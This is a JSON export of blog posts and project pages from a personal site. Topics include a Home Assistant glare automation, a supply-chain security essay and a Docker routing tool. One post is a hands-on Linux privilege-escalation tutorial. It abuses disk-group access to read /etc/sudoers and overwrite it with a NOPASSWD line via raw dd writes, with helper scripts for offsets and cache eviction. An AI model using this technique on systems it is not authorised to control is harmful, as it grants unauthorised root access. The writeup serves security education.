[{"content":"When working in my office during the day, I enjoy having my windows open to get as much natural light in as possible. However, this sometimes comes at a cost: glare. During certain times of the day, if there is little cloud cover, I get too much glare on my computer screen, which causes eye strain or makes reading difficult and distracting. So I took it upon myself to automate this problem away! This post outlines the process I took and how it works.\nConvert a Physical Problem into a Digital Problem I want to open and close my blinds automatically. This requires something that can physically control my blinds and expose an API or service which Home Assistant can call to make the physical state match the desired state. For this I chose to use a few of the SwitchBot Blind Tilt controllers. SwitchBot has a gold-quality integration that makes use of ESPHome Bluetooth Proxies.\nOnce set up, the SwitchBot app is no longer needed; you can have complete control with Home Assistant. If you have multiple windows facing the same direction, you can create a group to control them all with a single entity. If you have windows facing different directions, you will need a separate glare sensor and automation for each direction since the frustum angles will differ.\nAutomating the \u0026ldquo;Glare\u0026rdquo; State The desired logic is that the window blinds should be open if all of the following are true, else closed:
the sun is above the horizon (there is daylight outside)
it is not cloudy
the sun is not directly visible from my seated position (either to my eyes or reflected on my screen)
The first two can be determined by using the sun and weather entities in Home Assistant, but that last one requires some math.\nCalculating Glare Frustum In order to mathematically determine if there is glare, we need to determine the frustum between my eyes and the window. 
This provides a projected bounding box to compare to the position of the sun using its azimuth and elevation.\nTo calculate this, we need:
window heading (which compass direction it faces — use a compass app on your phone pointed perpendicular out through the window)
distance between eyes and window
distance between center of eyes and:
window\u0026rsquo;s horizontal left edge
window\u0026rsquo;s horizontal right edge
vertical top of window
vertical bottom of window
Once these measurements are taken, we can calculate the solar Azimuth and Elevation bounds for which there is glare.\nTake these measurements and enter their values in the following python script to calculate the boundaries. The variable names match the labels in the diagram above.\nimport math

# --- INPUTS: REPLACE THESE WITH YOUR MEASUREMENTS ---
# Units don\u0026#39;t matter (cm/inches) as long as they are consistent.

# 1. Compass direction your window faces (0=N, 90=E, 180=S)
HEADING = 90

# 2. Distance from eye to window glass
D = 100

# 3. Horizontal Offsets (Positive numbers)
# How far LEFT of your nose is the left window edge?
W_LEFT = 50
# How far RIGHT of your nose is the right window edge?
W_RIGHT = 50

# 4. Vertical Offsets (Positive numbers)
# How far UP from eye level is the top of the glass?
H_TOP = 40
# How far DOWN from eye level is the bottom of the glass?
H_BOTTOM = 10

# 5. Artificial Horizon (Optional)
# If structures outside the window (neighbor\u0026#39;s roof, fence, etc.) block
# the sun below a certain angle, set E_MIN to that angle in degrees.
# Set to 0 if there are no obstructions.
E_MIN = 0

# --- ALGORITHM ---
def calculate_angles():
    # 1. Calculate Field of View angles relative to the \u0026#34;Center Line\u0026#34; of sight
    # arctan(opposite / adjacent) * (180 / pi)

    # Horizontal angles (relative to straight ahead)
    angle_left = math.degrees(math.atan(W_LEFT / D))
    angle_right = math.degrees(math.atan(W_RIGHT / D))

    # Vertical angles (relative to horizon/eye-level)
    angle_up = math.degrees(math.atan(H_TOP / D))
    angle_down = math.degrees(math.atan(H_BOTTOM / D))

    # 2. Convert to World Coordinates (Azimuth \u0026amp; Elevation)
    # Azimuth: North is 0.
    # If looking out window (HEADING), Left is (-), Right is (+)
    az_min = HEADING - angle_left
    az_max = HEADING + angle_right

    # Sun elevation is relative to the horizon (0°).
    # The sun is never below the horizon, so min elevation defaults to 0.
    # Use E_MIN to account for structures blocking the sun at low angles.
    # Max elevation is the angle from eye level to the top of the window.
    el_min = max(E_MIN, 0.0)
    el_max = angle_up

    print(\u0026#34;-\u0026#34; * 30)
    print(\u0026#34;HOME ASSISTANT CONFIGURATION VALUES\u0026#34;)
    print(\u0026#34;-\u0026#34; * 30)
    print(f\u0026#34;Azimuth Min: {az_min:.1f}\u0026#34;)
    print(f\u0026#34;Azimuth Max: {az_max:.1f}\u0026#34;)
    print(f\u0026#34;Elevation Min: {el_min:.1f}\u0026#34;)
    print(f\u0026#34;Elevation Max: {el_max:.1f}\u0026#34;)
    print(\u0026#34;-\u0026#34; * 30)

if __name__ == \u0026#34;__main__\u0026#34;:
    calculate_angles()
Glare Template Sensor Now that the Azimuth and Elevation boundaries are calculated, we can create a binary template sensor in Home Assistant to reflect the current glare state.\nIn order to make the automation even simpler, the template will also take into consideration the current weather cloud coverage.\nReplace the values below with the bounds returned by the python script. 
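As a quick sanity check on the script\u0026rsquo;s arithmetic (using its sample inputs, which are illustrative defaults rather than real measurements), the math works out like this:

```python
import math

# Sample inputs from the script above (illustrative defaults)
HEADING, D, W_LEFT, W_RIGHT, H_TOP = 90, 100, 50, 50, 40

# arctan(opposite / adjacent), converted to degrees
az_min = HEADING - math.degrees(math.atan(W_LEFT / D))
az_max = HEADING + math.degrees(math.atan(W_RIGHT / D))
el_max = math.degrees(math.atan(H_TOP / D))

# A half-width of 50 at distance 100 subtends about 26.6 degrees
print(f"{az_min:.1f} {az_max:.1f} {el_max:.1f}")  # 63.4 116.6 21.8
```

So with those sample measurements, glare is only possible while the sun sits between azimuth 63.4° and 116.6° and below 21.8° of elevation.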
You may also need to update the weather provider if a different one is in use.\ntemplate:
  - binary_sensor:
      - name: \u0026#34;Office Glare\u0026#34;
        unique_id: office_glare
        icon: mdi:sun-angle
        state: \u0026gt;
          {# --- SENSOR INPUTS --- #}
          {% set az = states(\u0026#39;sensor.sun_solar_azimuth\u0026#39;) | float(0) %}
          {% set el = states(\u0026#39;sensor.sun_solar_elevation\u0026#39;) | float(0) %}
          {% set clouds = state_attr(\u0026#39;weather.pirate_weather\u0026#39;, \u0026#39;cloud_coverage\u0026#39;) | float(0) %}

          {# --- WINDOW CONFIGURATION --- #}
          {# The compass direction range where the window is visible #}
          {% set az_min = 92.0 %}
          {% set az_max = 138.4 %}
          {# The vertical range (Horizon -\u0026gt; Window Top) #}
          {# Min is 15.0 due to neighbor\u0026#39;s roof blocking sun below that angle #}
          {% set el_min = 15.0 %}
          {% set el_max = 33.0 %}

          {# --- WEATHER CONFIGURATION --- #}
          {# Glare only happens if clouds are low. (0-100 scale) #}
          {% set cloud_threshold = 30 %}

          {# --- LOGIC --- #}
          {% set is_aligned_horizontally = az_min \u0026lt;= az \u0026lt;= az_max %}
          {% set is_aligned_vertically = el_min \u0026lt;= el \u0026lt;= el_max %}
          {% set is_clear_sky = clouds \u0026lt; cloud_threshold %}

          {{ is_aligned_horizontally and is_aligned_vertically and is_clear_sky }}
Once created, the sensor binary_sensor.office_glare returns an on state when the sun is in a position that would cause glare, and off otherwise.\nNote If your window faces near North, the azimuth range may wrap around 0°/360° (e.g., 350° to 10°). In that case, change is_aligned_horizontally to use or instead of and: az \u0026gt;= az_min or az \u0026lt;= az_max.\nSolar Glare Automation Now that the glare sensor is created, an automation is needed to control the blinds given the glare and sun state. The blinds should only be open when the sun is up AND there is no glare; otherwise they close. 
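Before wiring up the automation, the wrap-around case from the note above can be sketched in plain python (a hypothetical helper mirroring the template\u0026rsquo;s comparison logic):

```python
def azimuth_aligned(az: float, az_min: float, az_max: float) -> bool:
    """True when the sun's azimuth falls inside the glare window."""
    if az_min <= az_max:
        # Normal case: contiguous range, e.g. 92.0 to 138.4
        return az_min <= az <= az_max
    # Wrapped case (window faces near North): the range crosses 0/360,
    # so the combined test becomes OR instead of AND.
    return az >= az_min or az <= az_max

print(azimuth_aligned(100.0, 92.0, 138.4))  # True  (contiguous range)
print(azimuth_aligned(5.0, 350.0, 10.0))    # True  (wrapped range)
print(azimuth_aligned(180.0, 350.0, 10.0))  # False
```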
The glare trigger uses a 2-minute buffer to prevent the blinds from rapidly toggling on partly cloudy days.\nThe SwitchBot Blind Tilt uses tilt_position values from 0 to 100, where 0 is fully closed and 50 is fully open (horizontal). Values above 50 tilt the blinds the other direction.\nThe following automation does that:\nalias: Office Blinds
mode: single
triggers:
  - trigger: sun
    event: sunset
  - trigger: sun
    event: sunrise
  - trigger: state
    entity_id:
      - binary_sensor.office_glare
    for:
      minutes: 2
actions:
  - if:
      - condition: sun
        before: sunset
        after: sunrise
      - condition: state
        entity_id: binary_sensor.office_glare
        state: \u0026#34;off\u0026#34;
    then:
      - action: cover.set_cover_tilt_position
        data:
          tilt_position: 50
        target:
          entity_id: cover.office_blinds
    else:
      - action: cover.set_cover_tilt_position
        data:
          tilt_position: 0
        target:
          entity_id: cover.office_blinds
After running this for a few days, you may need to adjust the boundaries a little. Here are some tips:
Glare starts before blinds close? Decrease az_min or el_min to widen the start of the glare range.
Blinds close but there\u0026rsquo;s no glare yet? Increase az_min or el_min to narrow the start of the glare range.
Blinds open but there\u0026rsquo;s still glare? Increase az_max or el_max to widen the end of the glare range.
Blinds close on overcast days? Increase cloud_threshold.
Blinds close when sun is behind a roof/structure? Increase el_min.
Once you get the values correct, it is very stable. Since the values for the sun\u0026rsquo;s Azimuth and Elevation are used, the calculations should work year round, even as the angle of the sun changes season to season.\n","permalink":"https://lanrat.com/posts/home-assistant-sun-glare-automation/","summary":"\u003cp\u003eWhen working in my office during the day, I enjoy having my windows open to get as much natural light in as possible. However, this sometimes comes at a cost: glare. 
During certain times of the day, if there is little cloud cover, I get too much glare on my computer screen and it creates eye-strain, or makes reading difficult or distracting. So I took it upon myself to automate this problem away! This post outlines the process I took and how it works.\u003c/p\u003e","title":"The Sun vs. My Monitor: Winning the Glare War with Home Assistant"},{"content":"\nThe disk group seems innocent enough - it\u0026rsquo;s meant for disk management utilities. But give someone disk group access and you\u0026rsquo;ve essentially handed them root. Here\u0026rsquo;s how to exploit raw block device access to bypass all file permissions and escalate privileges.\nWhile the XKCD comic above is tongue-in-cheek, using dd for filesystem manipulation is genuinely powerful and dangerous. The Linux disk group allows raw access to disks on the system. It\u0026rsquo;s meant to allow members to use tools to manage disk partitions and format disks at the block level. However, it can also be used to get arbitrary file read/write by directly editing the disk contents even if file system permissions forbid it. For this reason it is a very privileged group and should be considered equivalent to root access.\nThe disk group is usually gid 6 and allows full read/write access to block devices.\nShowing raw disk devices on a Linux system belonging to the disk group\nIf you can get into the disk group (without needing root access), you can use tools like debugfs for ext4 filesystems and xfs_db for xfs filesystems to interact with the disks. debugfs is quite user friendly with options to directly copy files into and out of the raw disk. xfs_db, on the other hand, is much lower level and will require using other tools such as dd to read/write to files on the disk.\nFor this guide, we will be working with xfs_db on an xfs filesystem.\nFile Read Example with xfs filesystem over LVM. 
Here rhel_eda--c-root is an LVM volume mapped to /dev/dm-0\nThese tools can let you view any data on the raw disk device, regardless of the filesystem permissions, even if the volume is mounted.\nIf the filesystem is mounted these tools may prevent writing, but we can use dd to work around that limitation.\nIn order to read the file, we need to get the offsets of the file\u0026rsquo;s blocks from the filesystem. To get this, we can start with the inode of the file on the filesystem to query its block addresses. ls -li can list the inode of any file, even if we don\u0026rsquo;t have read access to it.\nNote If the file is in a directory we don\u0026rsquo;t have access to, we can use xfs_db or debugfs on a parent directory that we do have access to in order to list the files or sub-directories and their inodes, descending into each one until the inode of the target file is found.\nGetting the inode of /etc/sudoers even though we do not have read access to the file:\nGetting the startblock and number of blocks that make up this file:\nUsing xfs_db to print part of the first block manually, even though we do not have filesystem read access\n# this prints the block map for the file at the given inode
$ xfs_db -r /dev/dm-0 -c \u0026#39;inode \u0026lt;INODE_NUM\u0026gt;\u0026#39; -c \u0026#39;bmap\u0026#39;

# print the file\u0026#39;s first block as hex
# use sed and xxd to print as ascii
$ xfs_db -r /dev/dm-0 -c \u0026#39;inode \u0026lt;INODE_NUM\u0026gt;\u0026#39; -c \u0026#39;dblock 0\u0026#39; -c \u0026#39;type data\u0026#39; -c print | sed \u0026#39;s/.*://; s/[[:space:]]//g\u0026#39; | xxd -r -p
Here we see that the file is 2 blocks. We read the first block by specifying dblock 0\nThe file is printed as data so that it is displayed in hex. 
Then sed 's/.*://; s/[[:space:]]//g' removes white space and line numbers so that xxd -r -p can convert the hex data back into text.\nTo get the 2nd block (or others) use dblock 1 replacing 1 with the 0-offset block number.\nFile Write Reading protected files is interesting, but the real fun begins when we start writing.\nIn order to write to the file system while the drive is mounted, we can use dd and seek to the exact offset of the file contents we want to overwrite.\nNote This method only changes the file contents, it does not alter any of the filesystem’s inode data, so only overwrite existing data, bytes for bytes. Do not attempt to append or shrink a file. While possible, that would involve updating the metadata in the file system and is more difficult and outside the scope of this article.\nIn order to write directly to the disk, we need to know the offset to write at. This can be manually calculated from the startblock and agblocks from xfs_db. Below is a shell script to automate that:\n#!/bin/bash INODE=\u0026#34;$1\u0026#34; # pass inode as argument DEVICE=/dev/dm-0 OFFSET_IN_FILE=0 # Change this to edit at a different position in the file # Get block info BMAP_OUTPUT=$(xfs_db -r $DEVICE -c \u0026#34;inode $INODE\u0026#34; -c \u0026#39;bmap\u0026#39; | grep \u0026#34;startblock\u0026#34;) # Extract AG and block (this assumes format: startblock XXXXX (AG/BLOCK)) AG=$(echo \u0026#34;$BMAP_OUTPUT\u0026#34; | sed -n \u0026#39;s/.*(\\([0-9]*\\)\\/[0-9]*).*/\\1/p\u0026#39;) BLOCK_IN_AG=$(echo \u0026#34;$BMAP_OUTPUT\u0026#34; | sed -n \u0026#39;s/.*([0-9]*\\/\\([0-9]*\\)).*/\\1/p\u0026#39;) # Get agblocks from xfs_db # You can find this value by running: xfs_db -r $DEVICE -c \u0026#39;sb 0\u0026#39; -c \u0026#39;print agblocks\u0026#39; AGBLOCKS=$(xfs_db -r $DEVICE -c \u0026#39;sb 0\u0026#39; -c \u0026#39;print agblocks\u0026#39; | awk \u0026#39;{print $3}\u0026#39;) # Calculate ABSOLUTE_BLOCK=$((AG * AGBLOCKS + BLOCK_IN_AG)) BYTE_OFFSET=$((ABSOLUTE_BLOCK * 
4096 + OFFSET_IN_FILE)) echo \u0026#34;AG: $AG\u0026#34; echo \u0026#34;Block in AG: $BLOCK_IN_AG\u0026#34; echo \u0026#34;Absolute block: $ABSOLUTE_BLOCK\u0026#34; echo \u0026#34;Byte offset: $BYTE_OFFSET\u0026#34; In order to test this and ensure you have the right offset, always read the file contents first using dd.\nReading the start of the first block of /etc/sudoers with dd to confirm that the offset into the disk is correct\n# read 1000 bytes from the data at \u0026lt;BYTE_OFFSET\u0026gt; dd if=/dev/dm-0 bs=1 status=none skip=\u0026lt;BYTE_OFFSET\u0026gt; count=1000 If we see the data we expected, it is safe to overwrite. If dd prints something else, recheck your offsets. If you write to the wrong location you could corrupt the filesystem and cause unexpected behavior.\nFile writing: Privilege Escalation If you are a member of the disk group, but not able to become root or use sudo, you can add yourself to /etc/sudoers to gain full root privileges.\nYou would want to add the following: YOUR_USERNAME ALL=(ALL) NOPASSWD: ALL\nreplacing YOUR_USERNAME with the username you want to add to sudoers.\nWarning Using the dd option conv=notrunc is CRITICAL! without it the filesystem could be truncated!\nOnce done, if any program reads the file it may still not see the changes. This is because the kernel has cached the previous version of the file in memory. Since we did not edit the file using the normal system calls, the kernel does not know the file has been changed on disk. 
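For completeness, the overwrite step described above looks roughly like the sketch below. BYTE_OFFSET and /dev/dm-0 are placeholders; the sketch runs against a scratch file so the conv=notrunc behavior can be seen safely:

```shell
# Stand-in for the raw block device
tmp=$(mktemp)
printf 'AAAAAAAAAA' > "$tmp"

# Overwrite 2 bytes at offset 3, byte for byte.
# conv=notrunc is critical: without it dd truncates the output.
printf 'BB' | dd of="$tmp" bs=1 seek=3 conv=notrunc status=none

cat "$tmp"  # AAABBAAAAA (same length, only bytes 3-4 changed)
```

Against the real device, of= would be /dev/dm-0 and seek= would be the BYTE_OFFSET computed by the script above.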
We need to tell the kernel to invalidate the cache so that the file is read from disk to see the changes.\nWarning If another process attempts to write to the file, it may overwrite your changes and flush the cached version back to disk.\nThe normal way to do this would be to let the kernel know the file has changed; for example, a touch /path/to/file would normally work, but since we do not have write access to the file in the OS this is not possible.\nAnother possibility would be to tell the kernel to drop all file system caches, but this still requires root, which we do not yet have:\n# This would force the kernel to drop cached file data
# Only the root user can write here, so this would fail
echo 3 \u0026gt; /proc/sys/vm/drop_caches
However, the kernel does allow any user with read access to a file to evict it from the file system cache.\nIf the vmtouch command is available, you can run vmtouch -e /path/to/file to evict it from the kernel\u0026rsquo;s cache so that the next time the file is accessed a fresh copy is read from disk. 
If vmtouch is not installed, you can download the source and compile it yourself.\nAlternatively, the same can be done with this minimal python script:\n#!/usr/bin/env python3
import os
import sys

if len(sys.argv) != 2:
    print(f\u0026#34;Usage: {sys.argv[0]} /path/to/file\u0026#34;)
    sys.exit(1)

file_path = sys.argv[1]

try:
    # You only need read access to open the file
    fd = os.open(file_path, os.O_RDONLY)
    stat_info = os.fstat(fd)
    # Tell the kernel we don\u0026#39;t need the cache for this file
    # (from offset 0 to the end of the file)
    os.posix_fadvise(fd, 0, stat_info.st_size, os.POSIX_FADV_DONTNEED)
    os.close(fd)
    print(f\u0026#34;Successfully evicted \u0026#39;{file_path}\u0026#39; from cache.\u0026#34;)
except FileNotFoundError:
    print(f\u0026#34;Error: File not found at \u0026#39;{file_path}\u0026#39;\u0026#34;)
except PermissionError:
    print(f\u0026#34;Error: No read permission for \u0026#39;{file_path}\u0026#39;\u0026#34;)
except Exception as e:
    print(f\u0026#34;An error occurred: {e}\u0026#34;)
After the cache eviction, the next time the file is read the new modified version will be used from disk.\nsudo -s works!\n","permalink":"https://lanrat.com/posts/linux-privilege-escalation-disk-group-dd/","summary":"\u003cp\u003e\u003ca href=\"https://xkcd.com/378/\"\u003e\u003cimg alt=\"XKCD Real Programmers\" loading=\"lazy\" src=\"/posts/linux-privilege-escalation-disk-group-dd/images/xkcd-real-programmers.webp#center\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eThe \u003ccode\u003edisk\u003c/code\u003e group seems innocent enough - it\u0026rsquo;s meant for disk management utilities. But give someone \u003ccode\u003edisk\u003c/code\u003e group access and you\u0026rsquo;ve essentially handed them root. 
Here\u0026rsquo;s how to exploit raw block device access to bypass all file permissions and escalate privileges.\u003c/p\u003e\n\u003cp\u003eWhile the XKCD comic above is tongue-in-cheek, using \u003ccode\u003edd\u003c/code\u003e for filesystem manipulation is genuinely powerful and dangerous. The Linux \u003ccode\u003edisk\u003c/code\u003e group allows raw access to disks on the system. It\u0026rsquo;s meant to allow members to use tools to manage disk partitions and format disks at the block level. However, it can also be used to get arbitrary file read/write by directly editing the disk contents even if file system permissions forbid it. For this reason it is a very privileged group and should be considered equivalent to root access.\u003c/p\u003e","title":"Linux Arbitrary File Write and Privilege Escalation with dd"},{"content":"A browser-based and CLI tool for generating WireGuard configurations compatible with Cloudflare WARP. The application generates keypairs locally in the browser or CLI, registers them with Cloudflare\u0026rsquo;s WARP API, and outputs a complete WireGuard configuration file with QR code for easy mobile import.\nAll processing happens client-side with no server-side storage. Configuration options include DNS server selection, MTU adjustment, allowed IPs, and persistent keepalive settings. A command-line shell script is also available for terminal-based workflows.\nExample:\n./scripts/warp-register.sh \u0026gt; warp.conf ","permalink":"https://lanrat.com/projects/cloudflare-warp-config-generator/","summary":"\u003cp\u003eA browser-based and CLI tool for generating WireGuard configurations compatible with Cloudflare WARP. The application generates keypairs locally in the browser or CLI, registers them with Cloudflare\u0026rsquo;s WARP API, and outputs a complete WireGuard configuration file with QR code for easy mobile import.\u003c/p\u003e\n\u003cp\u003eAll processing happens client-side with no server-side storage. 
Configuration options include DNS server selection, MTU adjustment, allowed IPs, and persistent keepalive settings. A command-line shell script is also available for terminal-based workflows.\u003c/p\u003e","title":"Cloudflare WARP Config Generator"},{"content":"Got a bunch of MikroTik switches running SwOS or SwOS Lite with no good way to manage them centrally? This library has you covered.\nBuilt by reverse engineering the SwOS HTTP API, it provides complete programmatic access to all switch features. Works with both SwOS and SwOS Lite, supports everything from port configs and PoE to VLANs and SNMP settings.\nComes with a CLI tool for quick lookups and a full Ansible module for managing your entire switch fleet through YAML playbooks. Compatible with CRS305, CRS310, CRS326, CSS610 and other SwOS-based switches.\n","permalink":"https://lanrat.com/projects/mikrotik-swos-python-library/","summary":"\u003cp\u003eGot a bunch of MikroTik switches running SwOS or SwOS Lite with no good way to manage them centrally? This library has you covered.\u003c/p\u003e\n\u003cp\u003eBuilt by reverse engineering the SwOS HTTP API, it provides complete programmatic access to all switch features. Works with both SwOS and SwOS Lite, supports everything from port configs and PoE to VLANs and SNMP settings.\u003c/p\u003e\n\u003cp\u003eComes with a CLI tool for quick lookups and a full Ansible module for managing your entire switch fleet through YAML playbooks. Compatible with CRS305, CRS310, CRS326, CSS610 and other SwOS-based switches.\u003c/p\u003e","title":"MikroTik SwOS Python Library"},{"content":"A collection of custom plugins for TRMNL e-ink displays. 
The repository provides a Docker-based development environment for creating and testing plugins that extend TRMNL functionality.\n","permalink":"https://lanrat.com/projects/trmnl-plugins/","summary":"\u003cp\u003eA collection of custom plugins for \u003ca href=\"https://trmnl.com/?ref=mrlanrat\"\u003eTRMNL\u003c/a\u003e e-ink displays. The repository provides a Docker-based development environment for creating and testing plugins that extend TRMNL functionality.\u003c/p\u003e","title":"TRMNL Plugins"},{"content":"In 2016, removing an 11-line npm package called left-pad broke thousands of projects worldwide. Nine years later, attackers compromised packages with 2.6 billion weekly downloads using phishing and self-propagating malware.\nThe Problem: A Decade of Escalating Supply Chain Attacks Timeline March 2016: Left-pad incident - removing an 11-line dependency broke thousands of projects including Babel and React.\nOctober 2021: ua-parser-js compromise - library with 7M+ weekly downloads hijacked multiple times, injecting cryptocurrency miners and password stealers.\nJanuary 2022: colors.js/faker.js sabotage - maintainer intentionally broke packages with 20M+ weekly downloads.\nSeptember 2025: Shai-Hulud attack - 20+ packages including chalk, debug, ansi-styles, and strip-ansi with 2.6B+ weekly downloads compromised through maintainer phishing.\nAttack Vectors Typosquatting: Malicious packages with names similar to popular libraries Dependency Confusion: Public packages mimicking private internal packages with higher version numbers Maintainer Account Compromise: Targeting legitimate maintainer credentials Subdependency Poisoning: Compromising lesser-known dependencies deep in the tree Minimal Dependencies in Practice Dependency management is about making informed choices. 
npm\u0026rsquo;s micro-package culture creates vast dependency trees, while languages like Go emphasize standard libraries and focused dependencies.\nNote This post isn\u0026rsquo;t about Node.js/npm versus Go. These principles apply to any language ecosystem, the key is understanding your dependency choices and their security implications regardless of the platform you\u0026rsquo;re using.\nReal-World Examples of \u0026ldquo;Less is More\u0026rdquo; For the libraries I maintain (eg: czds and extsort), minimal dependencies are a core principle. Sometimes I\u0026rsquo;ll implement something like minimal JWT parsing myself rather than pulling in a full cryptographic library with dozens of dependencies.\nThe github.com/miekg/dns Go library demonstrates this perfectly: it\u0026rsquo;s feature-complete for DNS operations but relies only on Go\u0026rsquo;s standard library and a few golang.org/x/ packages. Compare this to typical npm packages that can easily pull in 100+ transitive dependencies for similar functionality.\nEach dependency is a potential attack vector. Libraries with many dependencies spread trust across countless organizations and individuals.\nDependency Decision Framework Every dependency addition is a decision point. The difference between my JWT implementation and a typical npm approach: 20 lines of focused code versus potentially hundreds of transitive dependencies.\nRisk Assessment Before adding any dependency:\nScope: Is this dependency doing more than I need? Maintenance: How many maintainers does it have? When was it last updated? Trust Surface: How many transitive dependencies does it bring? Value Ratio: What\u0026rsquo;s the complexity vs. security impact ratio? Implementation vs. 
Import Implement yourself when:\nSimple, well-defined functionality (like string padding or basic parsing) Security-critical code where you need full control Stable requirements unlikely to change The \u0026ldquo;wheel\u0026rdquo; being reinvented is actually a simple function Import dependencies for:\nComplex algorithms you\u0026rsquo;re unlikely to implement correctly Cryptographic functions requiring specialized expertise Well-established protocols with extensive edge cases Libraries with strong track records and minimal dependencies My JWT parsing handles the specific decoding I need without the complexity of a full cryptographic library. The tradeoff: I handle basic token validation, but avoid 50+ dependencies that come with full-featured JWT libraries.\nEcosystem Considerations The npm ecosystem\u0026rsquo;s micro-package culture creates different risks than Go\u0026rsquo;s standard-library approach:\nnpm: 100+ transitive dependencies for basic functionality is common Go: Standard library covers most needs, focused external packages Python: Mix of comprehensive standard library and ecosystem packages Risk: Each ecosystem\u0026rsquo;s culture shapes your attack surface Core Principles Every dependency is a trust decision - you\u0026rsquo;re trusting not just the library, but its entire dependency tree Evaluate the value-to-risk ratio - sometimes 10 lines of custom code beats 50 transitive dependencies Audit what you actually need - many libraries provide far more functionality than you\u0026rsquo;ll use Factor in long-term maintenance - consider the burden of keeping dependencies updated vs. maintaining focused implementations Defensive Strategies Dependency Auditing: Use npm ls or go mod graph to visualize your complete dependency chain. Look for unexpected depth or breadth.\nVersion Pinning: Pin exact versions rather than using ranges. 
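As an illustration of exact pinning versus ranges in an npm manifest (a hypothetical package.json fragment; package names and versions are illustrative only), a bare version is installed exactly as written, while a caret prefix opts into automatic minor and patch updates:

```json
{
  "dependencies": {
    "left-pad": "1.3.0",
    "chalk": "^5.0.0"
  }
}
```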
This prevents automatic malicious updates but requires active management for security patches.\nVulnerability Scanning: Integrate tools like npm audit, govulncheck, or other language-specific security scanners into your CI/CD pipeline.\nStandard Library First: Default to language standard libraries when possible. They\u0026rsquo;re maintained by core language teams and have fewer dependencies.\nRegular Cleanup: Periodically audit and remove unused dependencies. Dead code dependencies still represent attack surface without value.\nSupply chain attacks have evolved from accidental disruption to targeted campaigns. Every dependency extends trust to its maintainers and their entire dependency tree. Minimal dependencies are an essential security practice.\n","permalink":"https://lanrat.com/posts/minimal-dependencies-supply-chain/","summary":"\u003cp\u003eIn 2016, removing an 11-line npm package called left-pad broke thousands of projects worldwide. Nine years later, attackers compromised packages with 2.6 billion weekly downloads using phishing and self-propagating malware.\u003c/p\u003e\n\u003ch2 id=\"the-problem-a-decade-of-escalating-supply-chain-attacks\"\u003eThe Problem: A Decade of Escalating Supply Chain Attacks\u003c/h2\u003e\n\u003ch3 id=\"timeline\"\u003eTimeline\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003eMarch 2016\u003c/strong\u003e: \u003ca href=\"https://en.wikipedia.org/wiki/Npm_left-pad_incident\"\u003eLeft-pad incident\u003c/a\u003e - removing an 11-line dependency broke thousands of projects including Babel and React.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eOctober 2021\u003c/strong\u003e: \u003ca href=\"https://www.bleepingcomputer.com/news/security/popular-npm-library-hijacked-to-install-password-stealers-miners/\"\u003eua-parser-js compromise\u003c/a\u003e - library with 7M+ weekly downloads hijacked multiple times, injecting cryptocurrency miners and password stealers.\u003c/p\u003e","title":"Software Supply Chain Security: The Case for Minimal 
Dependencies"},{"content":"Drouter provides dynamic route injection for Docker containers through label-based configuration. The systemd service monitors Docker containers and automatically configures static routes in their network namespaces without requiring elevated privileges within the containers themselves.\nThe system uses Docker labels to specify routing rules and applies them automatically when containers start or stop. This enables complex networking setups where containers need custom routing tables while maintaining security by avoiding privileged container execution for network configuration tasks.\n","permalink":"https://lanrat.com/projects/drouter/","summary":"\u003cp\u003eDrouter provides dynamic route injection for Docker containers through label-based configuration. The systemd service monitors Docker containers and automatically configures static routes in their network namespaces without requiring elevated privileges within the containers themselves.\u003c/p\u003e\n\u003cp\u003eThe system uses Docker labels to specify routing rules and applies them automatically when containers start or stop. This enables complex networking setups where containers need custom routing tables while maintaining security by avoiding privileged container execution for network configuration tasks.\u003c/p\u003e","title":"Drouter"},{"content":"When working with Docker containers on complex networks, you often need to add static routes so containers can reach networks that aren\u0026rsquo;t directly connected to their default gateway. 
This becomes especially important when using macvlan network drivers where containers get their own IP addresses on your physical network.\nI\u0026rsquo;ve just released drouter, a lightweight systemd service that solves this problem by automatically injecting routes into Docker containers based on simple labels.\nThe Problem Consider this scenario: you\u0026rsquo;re using a macvlan network driver so your containers get real IP addresses on your network (say 192.168.1.0/24). Your router is at 192.168.1.1, but you have additional internal subnets like 10.0.0.0/8 that are reachable through a different gateway at 192.168.1.254.\nWithout custom routes, your containers can only reach networks directly connected to their default gateway. Traffic to 10.0.0.0/8 would fail because the container doesn\u0026rsquo;t know how to route to that network.\nTraditional solutions require either:
Running containers with NET_ADMIN capabilities (security risk)
Manual route configuration after container startup (not scalable)
Complex init scripts inside containers (maintenance overhead)
The Solution Drouter monitors Docker container events and automatically adds routes to containers based on labels. When a container starts with drouter.routes.* labels, the service enters the container\u0026rsquo;s network namespace and configures the specified routes.\nHere\u0026rsquo;s how simple it is to configure:\n# docker-compose.yml
services:
  app:
    image: nginx
    networks:
      - macvlan_net
    labels:
      drouter.routes.ipv4: \u0026#34;10.0.0.0/8 via 192.168.1.254\u0026#34;
Now your container can reach the 10.0.0.0/8 network through the 192.168.1.254 gateway, even though it\u0026rsquo;s not the default route.\nInstallation Drouter runs as a systemd service on your Docker host. 
See the installation instructions on GitHub for the latest setup steps.\nConfiguration Examples Multiple Routes You can specify multiple routes using semicolon separation or multi-line format:\n# Single line with semicolons labels: drouter.routes.ipv4: \u0026#34;10.0.0.0/8 via 192.168.1.254;172.16.0.0/12 via 192.168.1.253\u0026#34; # Multi-line format (easier to read) labels: drouter.routes.ipv4: | 10.0.0.0/8 via 192.168.1.254 172.16.0.0/12 via 192.168.1.253 IPv6 Support Drouter fully supports IPv6 routing:\nlabels: drouter.routes.ipv6: \u0026#34;2001:db8::/32 via fe80::1\u0026#34; Docker CLI For non-compose deployments:\ndocker run -d \\ --label drouter.routes.ipv4=\u0026#34;10.0.0.0/8 via 192.168.1.254\u0026#34; \\ --net macvlan_net \\ nginx How It Works Drouter uses Docker\u0026rsquo;s event API to monitor container lifecycle events. When a container starts with route labels, it:\nDetects the container\u0026rsquo;s network namespace Uses nsenter to enter the namespace Adds routes with standard ip route add commands Skips duplicate routes to avoid conflicts The service handles Docker daemon restarts gracefully and doesn\u0026rsquo;t require elevated privileges for the containers themselves.\nWhy This Matters This approach is particularly valuable for:\nMacvlan networks: Containers with real IPs need custom routing for internal networks Multi-homed environments: Networks with multiple gateways or complex topologies Microservices: Different services needing access to different network segments Security: Avoiding NET_ADMIN capabilities in containers Before drouter, I was manually configuring routes or writing custom init scripts. Now it\u0026rsquo;s as simple as adding a label to my compose file.\nThe source code and detailed documentation are available on GitHub. 
